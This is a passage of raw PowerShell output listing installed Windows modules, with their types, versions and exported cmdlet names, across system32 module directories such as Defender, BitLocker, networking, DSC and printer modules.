Microsoft.PowerShell.Operation.V... {Get-OperationValidation, Invoke-OperationValidation}\r\nBinary 3.0.0.0 Microsoft.PowerShell.PackageMana... {Find-Package, Get-Package, Get-PackageProvider, Get-PackageSource...}\r\nBinary 3.0.0.0 Microsoft.PowerShell.PSReadline {Get-PSReadlineOption, Set-PSReadlineOption, Set-PSReadlineKeyHandler, Get-PSReadlineKeyHandler...}\r\nManifest 0.0 OperationValidationResources\r\nBinary 1.0.0.1 PackageManagement {Find-Package, Get-Package, Get-PackageProvider, Get-PackageSource...}\r\nScript 0.0 PackageProviderFunctions {Write-Debug, Write-Error, Write-Progress, Write-Verbose...}\r\nScript 3.4.0 Pester {Describe, Context, It, Should...}\r\nScript 3.4.0 Pester {Describe, Context, It, Should...}\r\nScript 1.0.0.1 PowerShellGet {Install-Module, Find-Module, Save-Module, Update-Module...}\r\nScript 1.0.0.1 PowerShellGet {Install-Module, Find-Module, Save-Module, Update-Module...}\r\nManifest 0.0 PSGet.Resource\r\nScript 1.2 PSReadline {Get-PSReadlineKeyHandler, Set-PSReadlineKeyHandler, Remove-PSReadlineKeyHandler, Get-PSReadlineOption...}\r\nScript 0.0 PSReadline {Get-PSReadlineOption, Set-PSReadlineKeyHandler, Get-PSReadlineKeyHandler, Set-PSReadlineOption...}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 1.0.0.0 AppBackgroundTask {Disable-AppBackgroundTaskDiagnosticLog, Enable-AppBackgroundTaskDiagnosticLog, Set-AppBackgroundTaskResourcePolicy, Unregister-AppBackground...\r\nManifest 2.0.0.0 AppLocker {Get-AppLockerFileInformation, Get-AppLockerPolicy, New-AppLockerPolicy, Set-AppLockerPolicy...}\r\nManifest 1.0.0.0 AppvClient {Add-AppvClientConnectionGroup, Add-AppvClientPackage, Add-AppvPublishingServer, Disable-Appv...}\r\nScript 0.0 AppVClientCmdlets {Get-AppvVirtualProcess, Start-AppvVirtualProcess}\r\nManifest 2.0.0.0 Appx {Add-AppxPackage, Get-AppxPackage, Get-AppxPackageManifest, Remove-AppxPackage...}\r\nScript 0.0 Appx {Get-AppxLastError, Get-AppxLog}\r\nScript 1.0.0.0 AssignedAccess {Clear-AssignedAccess, Get-AssignedAccess, Set-AssignedAccess}\r\nScript 0.0 AssignedAccess {Get-AssignedAccess, Set-AssignedAccess, Clear-AssignedAccess}\r\nManifest 1.0.0.0 BitLocker {Unlock-BitLocker, Suspend-BitLocker, Resume-BitLocker, Remove-BitLockerKeyProtector...}\r\nScript 1.0.0.0 BitLocker {Unlock-BitLocker, Suspend-BitLocker, Resume-BitLocker, Remove-BitLockerKeyProtector...}\r\nManifest 2.0.0.0 BitsTransfer {Add-BitsFile, Complete-BitsTransfer, Get-BitsTransfer, Remove-BitsTransfer...}\r\nManifest 1.0.0.0 BranchCache {Add-BCDataCacheExtension, Clear-BCCache, Disable-BC, Disable-BCDowngrading...}\r\nCim 1.0.0 BranchCacheClientSettingData Get-BCClientConfiguration\r\nCim 1.0.0 BranchCacheContentServerSettingData Get-BCContentServerConfiguration\r\nCim 1.0.0 BranchCacheHostedCacheServerSett... Get-BCHostedCacheServerConfiguration\r\nCim 1.0.0 BranchCacheNetworkSettingData Get-BCNetworkConfiguration\r\nCim 1.0.0 BranchCacheOrchestrator {Add-BCDataCacheExtension, Clear-BCCache, Disable-BC, Disable-BCDowngrading...}\r\nCim 1.0.0 BranchCachePrimaryPublicationCac... Get-BCHashCache\r\nCim 1.0.0 BranchCachePrimaryRepublicationC... Get-BCDataCache\r\nCim 1.0.0 BranchCacheSecondaryRepublicatio... Get-BCDataCacheExtension\r\nCim 1.0.0 BranchCacheStatus Get-BCStatus\r\nCim 1.0 CIM_PhysicalComputerSystemView {Get-PcsvDevice, Start-PcsvDevice, Stop-PcsvDevice, Restart-PcsvDevice...}\r\nManifest 1.0.0.0 CimCmdlets {Get-CimAssociatedInstance, Get-CimClass, Get-CimInstance, Get-CimSession...}\r\nScript 0.0 CmdletHelpers {CmdletShouldProcess, Get-NetworkSwitchRegisteredProfileFromNamespace, Get-NetworkSwitchImplementationNamespace, New-LocalCimInstance...}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 CompositeResourceHelper {BuildResourceCommonParameters, BuildResourceString}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 1.0 ConfigCI {Get-SystemDriver, New-CIPolicyRule, New-CIPolicy, Get-CIPolicy...}\r\nManifest 1.0 Defender {Get-MpPreference, Set-MpPreference, Add-MpPreference, Remove-MpPreference...}\r\nManifest 1.0.0.0 DirectAccessClientComponents {Disable-DAManualEntryPointSelection, Enable-DAManualEntryPointSelection, Get-DAClientExperienceConfiguration, Get-DAEntryPointTableItem...}\r\nCim 2.0.0.0 Disable-DscDebug Disable-DscDebug\r\nCim 1.0.0.0 Disk {Get-Disk, Initialize-Disk, Clear-Disk, New-Partition...}\r\nCim 1.0.0.0 DiskImage {Get-DiskImage, Mount-DiskImage, Dismount-DiskImage}\r\nScript 3.0 Dism {Add-AppxProvisionedPackage, Add-WindowsDriver, Add-WindowsCapability, Add-WindowsImage...}\r\nScript 3.0 Dism {Add-AppxProvisionedPackage, Add-WindowsDriver, Add-WindowsCapability, Add-WindowsImage...}\r\nManifest 1.0.0.0 DnsClient {Resolve-DnsName, Clear-DnsClientCache, Get-DnsClient, Get-DnsClientCache...}\r\nBinary 10.0.0.0 dnslookup Resolve-DnsName\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DownloadManager\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 1.0 DSCFileDownloadManager {Get-DscAction, Get-DSCDocument, Get-DSCModule}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 DSCResourceHelper IsNanoServer\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 2.0.0.0 Enable-DscDebug Enable-DscDebug\r\nManifest 1.0.0.0 EventTracingManagement {New-EtwTraceSession, Get-EtwTraceSession, Set-EtwTraceSession, Send-EtwTraceSession...}\r\nCim 1.0.0.0 FileIntegrity {Get-FileIntegrity, Set-FileIntegrity, Repair-FileIntegrity}\r\nCim 1.0.0.0 FileServer {Get-StorageFileServer, Remove-StorageFileServer, Set-StorageFileServer, New-FileShare}\r\nCim 1.0.0.0 FileShare {Get-FileShare, Remove-FileShare, Grant-FileShareAccess, Block-FileShareAccess...}\r\nCim 1.0.0.0 FileStorageTier {Get-FileStorageTier, Set-FileStorageTier, Clear-FileStorageTier}\r\nCim 2.0.0.0 Get-DscConfiguration Get-DscConfiguration\r\nCim 2.0.0.0 Get-DscConfigurationStatus Get-DscConfigurationStatus\r\nCim 2.0.0.0 Get-DSCLocalConfigurationManager Get-DscLocalConfigurationManager\r\nScript 0.0 GetStartApps {Get-StartApps, Get-AllStartApps}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 1.0 GroupSet {BuildResourceCommonParameters, BuildResourceString}\r\nScript 1.0 GroupSet {BuildResourceCommonParameters, BuildResourceString}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0.0.0 InitiatorId {Get-InitiatorId, Remove-InitiatorId}\r\nCim 1.0.0.0 InitiatorPort {Get-InitiatorPort, Set-InitiatorPort}\r\nManifest 2.0.0.0 International {Get-WinDefaultInputMethodOverride, Set-WinDefaultInputMethodOverride, Get-WinHomeLocation, Set-WinHomeLocation...}\r\nManifest 1.0.0.0 iSCSI {Get-IscsiTargetPortal, New-IscsiTargetPortal, Remove-IscsiTargetPortal, Update-IscsiTargetPortal...}\r\nCim 1.0 iSCSIConnection Get-IscsiConnection\r\nCim 1.0 iSCSISession {Get-IscsiSession, Unregister-IscsiSession, Register-IscsiSession, Set-IscsiChapSecret}\r\nCim 1.0 iSCSITarget {Get-IscsiTarget, Disconnect-IscsiTarget, Update-IscsiTarget, Connect-IscsiTarget}\r\nCim 1.0 iSCSITargetPortal {Get-IscsiTargetPortal, Remove-IscsiTargetPortal, Update-IscsiTargetPortal, New-IscsiTargetPortal}\r\nScript 1.0.0.0 ise {New-IseSnippet, Import-IseSnippet, Get-IseSnippet}\r\nScript 0.0 ise {Import-IseSnippet, Get-IseSnippet, New-IseSnippet}\r\nManifest 1.0.0.0 Kds {Add-KdsRootKey, Get-KdsRootKey, Test-KdsRootKey, Set-KdsConfiguration...}\r\nCim 1.0.0.0 MaskingSet {Get-MaskingSet, Remove-MaskingSet, Rename-MaskingSet, Add-InitiatorIdToMaskingSet...}\r\nBinary 10.0.0.0 Microsoft.AppV.AppvClientComCons...\r\nBinary 10.0.0.0 Microsoft.AppV.AppVClientPowerShell {Add-AppvClientConnectionGroup, Add-AppvClientPackage, Add-AppvPublishingServer, Disable-Appv...}\r\nBinary 0.0.0.0 Microsoft.AppV.ClientProgrammabi...\r\nBinary 0.0.0.0 Microsoft.BackgroundIntelligentT...\r\nBinary 0.0.0.0 Microsoft.BitLocker.Structures\r\nBinary 10.0.0.0 Microsoft.Dism.PowerShell {Add-WindowsPackage, Remove-WindowsPackage, Get-WindowsPackage, Enable-WindowsOptionalFeature...}\r\nManifest 1.0.1.0 Microsoft.PowerShell.Archive {Compress-Archive, Expand-Archive}\r\nScript 0.0 Microsoft.PowerShell.Archive {Compress-Archive, Expand-Archive, GetResolvedPathHelper, Add-CompressionAssemblies...}\r\nManifest 3.0.0.0 Microsoft.PowerShell.Diagnostics {Get-WinEvent, Get-Counter, Import-Counter, Export-Counter...}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DownloadManager\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nBinary 3.0.0.0 Microsoft.PowerShell.DSC.FileDow... {Get-DscAction, Get-DSCDocument, Get-DSCModule}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 3.0.0.0 Microsoft.PowerShell.Host {Start-Transcript, Stop-Transcript}\r\nBinary 3.0.0.0 Microsoft.PowerShell.LocalAccounts {Add-LocalGroupMember, Disable-LocalUser, Enable-LocalUser, Get-LocalGroup...}\r\nManifest 1.0.0.0 Microsoft.PowerShell.LocalAccounts {Add-LocalGroupMember, Disable-LocalUser, Enable-LocalUser, Get-LocalGroup...}\r\nManifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Content, Clear-Content, Clear-ItemProperty, Join-Path...}\r\nScript 1.0 Microsoft.PowerShell.ODataUtils Export-ODataEndpointProxy\r\nScript 1.0 Microsoft.PowerShell.ODataUtils Export-ODataEndpointProxy\r\nManifest 3.0.0.0 Microsoft.PowerShell.Security {Get-Acl, Set-Acl, Get-PfxCertificate, Get-Credential...}\r\nManifest 3.1.0.0 Microsoft.PowerShell.Utility {Format-List, Format-Custom, Format-Table, Format-Wide...}\r\nScript 0.0 Microsoft.PowerShell.Utility {Get-FileHash, New-TemporaryFile, New-Guid, Format-Hex...}\r\nBinary 10.0.0.0 Microsoft.Uev.Commands {Clear-UevConfiguration, Clear-UevAppxPackage, Restore-UevBackup, Set-UevTemplateProfile...}\r\nBinary 10.0.0.0 Microsoft.Windows.AppBackgroundT... {Enable-AppBackgroundTaskDiagnosticLog, Disable-AppBackgroundTaskDiagnosticLog, Set-AppBackgroundTaskResourcePolicy}\r\nBinary 10.0.0.0 Microsoft.Windows.Firewall.Commands {New-NetIPsecAuthProposal, New-NetIPsecMainModeCryptoProposal, New-NetIPsecQuickModeCryptoProposal, Get-DAPolicyChange}\r\nBinary 10.0.0.0 Microsoft.WindowsErrorReporting.... {Enable-WindowsErrorReporting, Disable-WindowsErrorReporting, Get-WindowsErrorReporting}\r\nBinary 10.0.0.0 Microsoft.WindowsSearch.Commands {Get-WindowsSearchSetting, Set-WindowsSearchSetting}\r\nManifest 3.0.0.0 Microsoft.WSMan.Management {Disable-WSManCredSSP, Enable-WSManCredSSP, Get-WSManCredSSP, Set-WSManQuickConfig...}\r\nManifest 1.0 MMAgent {Disable-MMAgent, Enable-MMAgent, Set-MMAgent, Get-MMAgent...}\r\nManifest 1.0.0.0 MsDtc {New-DtcDiagnosticTransaction, Complete-DtcDiagnosticTransaction, Join-DtcDiagnosticResourceManager, Receive-DtcDiagnosticTransaction...}\r\nCim 1.0 MSFT_3DPrinter_v1.0\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 MSFT_ArchiveResource {Test-TargetResource, Set-TargetResource, Get-TargetResource}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0.0.0 MSFT_AutologgerConfig_v1.0 {Get-AutologgerConfig, Set-AutologgerConfig, Remove-AutologgerConfig, New-AutologgerConfig}\r\nCim 1.0 MSFT_DAClientExperienceConfigura... {Get-DAClientExperienceConfiguration, Set-DAClientExperienceConfiguration, Reset-DAClientExperienceConfiguration}\r\nCim 1.0 MSFT_DAConnectionStatus Get-DAConnectionStatus\r\nCim 1.0 MSFT_DASiteTableEntry {Get-DAEntryPointTableItem, Set-DAEntryPointTableItem, Remove-DAEntryPointTableItem, Reset-DAEntryPointTableItem...}\r\nCim 1.0.0 MSFT_DnsClient {Get-DnsClient, Set-DnsClient, Register-DnsClient}\r\nCim 1.0.0 MSFT_DnsClientCache {Get-DnsClientCache, Clear-DnsClientCache}\r\nCim 1.0.0 MSFT_DnsClientGlobalSetting {Get-DnsClientGlobalSetting, Set-DnsClientGlobalSetting}\r\nCim 1.0.0 MSFT_DnsClientServerAddress {Get-DnsClientServerAddress, Set-DnsClientServerAddress}\r\nCim 1.0 MSFT_DtcAdvancedHostSettingTask_... {Get-DtcAdvancedHostSetting, Set-DtcAdvancedHostSetting}\r\nCim 1.0 MSFT_DtcAdvancedSettingTask_v1.0 {Get-DtcAdvancedSetting, Set-DtcAdvancedSetting}\r\nCim 1.0 MSFT_DtcClusterDefaultTask_v1.0 {Get-DtcClusterDefault, Set-DtcClusterDefault}\r\nCim 1.0 MSFT_DtcClusterTMMappingTask_v1.0 {Add-DtcClusterTMMapping, Get-DtcClusterTMMapping, Remove-DtcClusterTMMapping, Set-DtcClusterTMMapping}\r\nCim 1.0 MSFT_DtcDefaultTask_v1.0 {Get-DtcDefault, Set-DtcDefault}\r\nCim 1.0 MSFT_DtcLogTask_v1.0 {Get-DtcLog, Reset-DtcLog, Set-DtcLog}\r\nCim 1.0 MSFT_DtcNetworkSettingTask_v1.0 {Get-DtcNetworkSetting, Set-DtcNetworkSetting}\r\nCim 1.0 MSFT_DtcTask_v1.0 {Get-Dtc, Install-Dtc, Start-Dtc, Stop-Dtc...}\r\nCim 1.0 MSFT_DtcTransactionsStatisticsTa... Get-DtcTransactionsStatistics\r\nCim 1.0 MSFT_DtcTransactionsTraceSession... {Get-DtcTransactionsTraceSession, Set-DtcTransactionsTraceSession, Start-DtcTransactionsTraceSession, Stop-DtcTransactionsTraceSession...}\r\nCim 1.0 MSFT_DtcTransactionsTraceSetting... {Get-DtcTransactionsTraceSetting, Set-DtcTransactionsTraceSetting}\r\nCim 1.0 MSFT_DtcTransactionTask_v1.0 {Get-DtcTransaction, Set-DtcTransaction}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 MSFT_EnvironmentResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0.0.0 MSFT_EtwTraceProvider_v1.0 {Get-EtwTraceProvider, Set-EtwTraceProvider, Remove-EtwTraceProvider, Add-EtwTraceProvider}\r\nCim 1.0.0.0 MSFT_EtwTraceSession_v1.0 {Get-EtwTraceSession, Remove-EtwTraceSession, Set-EtwTraceSession, Send-EtwTraceSession...}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 MSFT_GroupResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0 MSFT_LocalPrinterPort_v1.0\r\nCim 1.0 MSFT_LprPrinterPort_v1.0\r\nCim 1.0 MSFT_MpComputerStatus Get-MpComputerStatus\r\nCim 1.0 MSFT_MpPreference {Get-MpPreference, Set-MpPreference, Add-MpPreference, Remove-MpPreference}\r\nCim 1.0 MSFT_MpScan Start-MpScan\r\nCim 1.0 MSFT_MpSignature Update-MpSignature\r\nCim 1.0 MSFT_MpThreat {Get-MpThreat, Remove-MpThreat}\r\nCim 1.0 MSFT_MpThreatCatalog Get-MpThreatCatalog\r\nCim 1.0 MSFT_MpThreatDetection Get-MpThreatDetection\r\nCim 1.0 MSFT_MpWDOScan Start-MpWDOScan\r\nCim 1.0 MSFT_NCSIPolicyConfiguration {Get-NCSIPolicyConfiguration, Set-NCSIPolicyConfiguration, Reset-NCSIPolicyConfiguration}\r\nCim 1.0 MSFT_Net6to4Configuration {Get-Net6to4Configuration, Set-Net6to4Configuration, Reset-Net6to4Configuration}\r\nCim 1.0 MSFT_NetAdapter.cmdletDefinition {Get-NetAdapter, Enable-NetAdapter, Disable-NetAdapter, Restart-NetAdapter...}\r\nCim 1.0 MSFT_NetAdapterAdvancedProperty.... {Get-NetAdapterAdvancedProperty, Set-NetAdapterAdvancedProperty, Remove-NetAdapterAdvancedProperty, Reset-NetAdapterAdvancedProperty...}\r\nCim 1.0 MSFT_NetAdapterBinding.cmdletDef... {Get-NetAdapterBinding, Set-NetAdapterBinding, Enable-NetAdapterBinding, Disable-NetAdapterBinding}\r\nCim 1.0 MSFT_NetAdapterChecksumOffload {Get-NetAdapterChecksumOffload, Set-NetAdapterChecksumOffload, Enable-NetAdapterChecksumOffload, Disable-NetAdapterChecksumOffload}\r\nCim 1.0 MSFT_NetAdapterEncapsulatedPacke... {Get-NetAdapterEncapsulatedPacketTaskOffload, Set-NetAdapterEncapsulatedPacketTaskOffload, Enable-NetAdapterEncapsulatedPacketTaskOffload, Di...\r\nCim 1.0 MSFT_NetAdapterHardwareInfo.cmdl... Get-NetAdapterHardwareInfo\r\nCim 1.0 MSFT_NetAdapterIPsecOffload {Get-NetAdapterIPsecOffload, Set-NetAdapterIPsecOffload, Enable-NetAdapterIPsecOffload, Disable-NetAdapterIPsecOffload}\r\nCim 1.0 MSFT_NetAdapterLso {Get-NetAdapterLso, Set-NetAdapterLso, Enable-NetAdapterLso, Disable-NetAdapterLso}\r\nCim 1.0 MSFT_NetAdapterPacketDirect {Get-NetAdapterPacketDirect, Set-NetAdapterPacketDirect, Enable-NetAdapterPacketDirect, Disable-NetAdapterPacketDirect}\r\nCim 1.0 MSFT_NetAdapterPowerManagement.c... {Get-NetAdapterPowerManagement, Set-NetAdapterPowerManagement, Enable-NetAdapterPowerManagement, Disable-NetAdapterPowerManagement}\r\nScript 0.0 MSFT_NetAdapterPowerManagement.F... {Format-NdisConfigurationValue, Format-WakePatternType, Format-BitmapWakePattern}\r\nCim 1.0 MSFT_NetAdapterQos {Get-NetAdapterQos, Set-NetAdapterQos, Enable-NetAdapterQos, Disable-NetAdapterQos}\r\nScript 0.0 MSFT_NetAdapterQos.Format.Helper {Format-NetAdapterQosIntegerArray, Format-NetAdapterQosTrafficClass, Format-NetAdapterQosFlowControl, Format-NetAdapterQosClassification}\r\nCim 1.0 MSFT_NetAdapterRdma {Get-NetAdapterRdma, Set-NetAdapterRdma, Enable-NetAdapterRdma, Disable-NetAdapterRdma}\r\nCim 1.0 MSFT_NetAdapterRsc {Get-NetAdapterRsc, Set-NetAdapterRsc, Enable-NetAdapterRsc, Disable-NetAdapterRsc}\r\nCim 1.0 MSFT_NetAdapterRss.cmdletDefinition {Get-NetAdapterRss, Set-NetAdapterRss, Enable-NetAdapterRss, Disable-NetAdapterRss}\r\nCim 1.0 MSFT_NetAdapterSriov {Get-NetAdapterSriov, Set-NetAdapterSriov, Enable-NetAdapterSriov, Disable-NetAdapterSriov}\r\nCim 1.0 MSFT_NetAdapterSriovVf.cmdletDef... Get-NetAdapterSriovVf\r\nCim 1.0 MSFT_NetAdapterStatistics.cmdlet... Get-NetAdapterStatistics\r\nCim 1.0 MSFT_NetAdapterVmq.cmdletDefinition {Get-NetAdapterVmq, Set-NetAdapterVmq, Enable-NetAdapterVmq, Disable-NetAdapterVmq}\r\nCim 1.0 MSFT_NetAdapterVmqQueue.cmdletDe... Get-NetAdapterVmqQueue\r\nCim 1.0 MSFT_NetAdapterVPort.cmdletDefin... Get-NetAdapterVPort\r\nCim 1.0 MSFT_NetCompartment Get-NetCompartment\r\nCim 1.0 MSFT_NetConnectionProfile {Get-NetConnectionProfile, Set-NetConnectionProfile}\r\nCim 1.0 MSFT_NetDnsTransitionConfiguration {Get-NetDnsTransitionConfiguration, Enable-NetDnsTransitionConfiguration, Disable-NetDnsTransitionConfiguration, Reset-NetDnsTransitionConfig...\r\nCim 1.0 MSFT_NetDnsTransitionMonitoring Get-NetDnsTransitionMonitoring\r\nCim 1.1 MSFT_NetEventNetworkAdapter {Get-NetEventNetworkAdapter, Remove-NetEventNetworkAdapter, Add-NetEventNetworkAdapter}\r\nCim 1.0 MSFT_NetEventPacketCaptureProvider {Get-NetEventPacketCaptureProvider, Remove-NetEventPacketCaptureProvider, Set-NetEventPacketCaptureProvider, Add-NetEventPacketCaptureProvider}\r\nCim 1.0 MSFT_NetEventProvider {Get-NetEventProvider, Remove-NetEventProvider, Set-NetEventProvider, Add-NetEventProvider}\r\nCim 1.0 MSFT_NetEventSession {Get-NetEventSession, Remove-NetEventSession, Set-NetEventSession, Start-NetEventSession...}\r\nCim 1.0 MSFT_NetEventVFPProvider {Get-NetEventVFPProvider, Remove-NetEventVFPProvider, Set-NetEventVFPProvider, Add-NetEventVFPProvider}\r\nCim 1.0 MSFT_NetEventVmNetworkAdatper {Get-NetEventVmNetworkAdapter, Remove-NetEventVmNetworkAdapter, Add-NetEventVmNetworkAdapter}\r\nCim 1.0 MSFT_NetEventVmSwitch {Get-NetEventVmSwitch, Remove-NetEventVmSwitch, Add-NetEventVmSwitch}\r\nCim 1.0 MSFT_NetEventVmSwitchProvider {Get-NetEventVmSwitchProvider, Remove-NetEventVmSwitchProvider, Set-NetEventVmSwitchProvider, Add-NetEventVmSwitchProvider}\r\nCim 1.0 MSFT_NetEventWFPCaptureProvider {Get-NetEventWFPCaptureProvider, Remove-NetEventWFPCaptureProvider, Set-NetEventWFPCaptureProvider, Add-NetEventWFPCaptureProvider}\r\nCim 1.0.0 MSFT_NetIPAddress {Get-NetIPAddress, Set-NetIPAddress, Remove-NetIPAddress, New-NetIPAddress}\r\nCim 1.0 MSFT_NetIpHTTPsConfiguration {Get-NetIPHttpsConfiguration, Set-NetIPHttpsConfiguration, Remove-NetIPHttpsConfiguration, Reset-NetIPHttpsConfiguration...}\r\nCim 1.0 MSFT_NetIpHTTPsState Get-NetIPHttpsState\r\nCim 1.0.0 MSFT_NetIPInterface {Get-NetIPInterface, Set-NetIPInterface}\r\nCim 1.0.0 MSFT_NetIPv4Protocol {Get-NetIPv4Protocol, Set-NetIPv4Protocol}\r\nCim 1.0.0 MSFT_NetIPv6Protocol {Get-NetIPv6Protocol, Set-NetIPv6Protocol}\r\nCim 1.0 MSFT_NetISATAPConfiguration {Get-NetIsatapConfiguration, Set-NetIsatapConfiguration, Reset-NetIsatapConfiguration}\r\nCim 1.0 MSFT_NetLbfoTeam {Get-NetLbfoTeam, Remove-NetLbfoTeam, Set-NetLbfoTeam, New-NetLbfoTeam...}\r\nCim 1.0 MSFT_NetLbfoTeamMember {Get-NetLbfoTeamMember, Set-NetLbfoTeamMember, Remove-NetLbfoTeamMember, Add-NetLbfoTeamMember}\r\nCim 1.0 MSFT_NetLbfoTeamNic {Get-NetLbfoTeamNic, Set-NetLbfoTeamNic, Remove-NetLbfoTeamNic, Add-NetLbfoTeamNic}\r\nCim 1.0 MSFT_NetNat {Get-NetNat, Set-NetNat, Remove-NetNat, New-NetNat}\r\nCim 1.0 MSFT_NetNatExternalAddress {Get-NetNatExternalAddress, Remove-NetNatExternalAddress, Add-NetNatExternalAddress}\r\nCim 1.0 MSFT_NetNatGlobal {Get-NetNatGlobal, Set-NetNatGlobal}\r\nCim 1.0 MSFT_NetNatSession Get-NetNatSession\r\nCim 1.0 MSFT_NetNatStaticMapping {Get-NetNatStaticMapping, Remove-NetNatStaticMapping, Add-NetNatStaticMapping}\r\nCim 1.0 MSFT_NetNatTransitionConfiguration {Get-NetNatTransitionConfiguration, Set-NetNatTransitionConfiguration, Enable-NetNatTransitionConfiguration, Disable-NetNatTransitionConfigur...\r\nCim 1.0 MSFT_NetNatTransitionMonitoring Get-NetNatTransitionMonitoring\r\nCim 1.0.0 MSFT_NetNeighbor {Get-NetNeighbor, Set-NetNeighbor, Remove-NetNeighbor, New-NetNeighbor}\r\nCim 1.0.0 MSFT_NetOffloadGlobalSetting {Get-NetOffloadGlobalSetting, Set-NetOffloadGlobalSetting}\r\nCim 1.0.0 MSFT_NetPrefixPolicy Get-NetPrefixPolicy\r\nCim 1.0 MSFT_NetQosPolicy {Get-NetQosPolicy, Set-NetQosPolicy, Remove-NetQosPolicy, New-NetQosPolicy}\r\nScript 0.0 MSFT_NetQosPolicy.Format.Helper Format-NetQosPolicySpeed\r\nCim 1.0.0 MSFT_NetRoute {Get-NetRoute, Set-NetRoute, Remove-NetRoute, New-NetRoute...}\r\nCim 1.0 MSFT_NetSwitchTeam {Get-NetSwitchTeam, Remove-NetSwitchTeam, New-NetSwitchTeam, Rename-NetSwitchTeam...}\r\nCim 1.0 MSFT_NetSwitchTeamMember Get-NetSwitchTeamMember\r\nCim 1.0.0 MSFT_NetTCPConnection Get-NetTCPConnection\r\nCim 1.0.0 MSFT_NetTCPSetting {Get-NetTCPSetting, Set-NetTCPSetting}\r\nCim 1.0 MSFT_NetTeredoConfiguration {Get-NetTeredoConfiguration, Set-NetTeredoConfiguration, Reset-NetTeredoConfiguration}\r\nCim 1.0 MSFT_NetTeredoState Get-NetTeredoState\r\nCim 1.0.0 MSFT_NetTransportFilter {Get-NetTransportFilter, Remove-NetTransportFilter, New-NetTransportFilter}\r\nCim 1.0.0 MSFT_NetUDPEndpoint Get-NetUDPEndpoint\r\nCim 1.0.0 MSFT_NetUDPSetting {Get-NetUDPSetting, Set-NetUDPSetting}\r\nCim 1.0 MSFT_OdbcDriverTask_v1.0 {Get-OdbcDriver, Set-OdbcDriver}\r\nCim 1.0 MSFT_OdbcDsnTask_v1.0 {Add-OdbcDsn, Get-OdbcDsn, Remove-OdbcDsn, Set-OdbcDsn}\r\nCim 1.0 MSFT_OdbcPerfCounterTask_v1.0 {Disable-OdbcPerfCounter, Enable-OdbcPerfCounter, Get-OdbcPerfCounter}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\DSCResources\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nScript 0.0 MSFT_PackageResource {Test-TargetResource, Get-TargetResource, Set-TargetResource}\r\n\r\n\r\n Directory: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nCim 1.0 MSFT_Printer_v1.0 {Get-Printer, Remove-Printer, Set-Printer, Add-Printer...}\r\nCim 1.0 MSFT_PrinterConfiguration_v1.0 {Get-PrintConfiguration, Set-PrintConfiguration}\r\nCim 1.0 MSFT_PrinterDriver_v1.0 {Get-PrinterDriver, Remove-PrinterDriver, Add-PrinterDriver}\r\nCim 1.0 MSFT_PrinterNfcTag_v1.0\r\nCim 1.0 MSFT_PrinterNfcTagTasks_v1.0 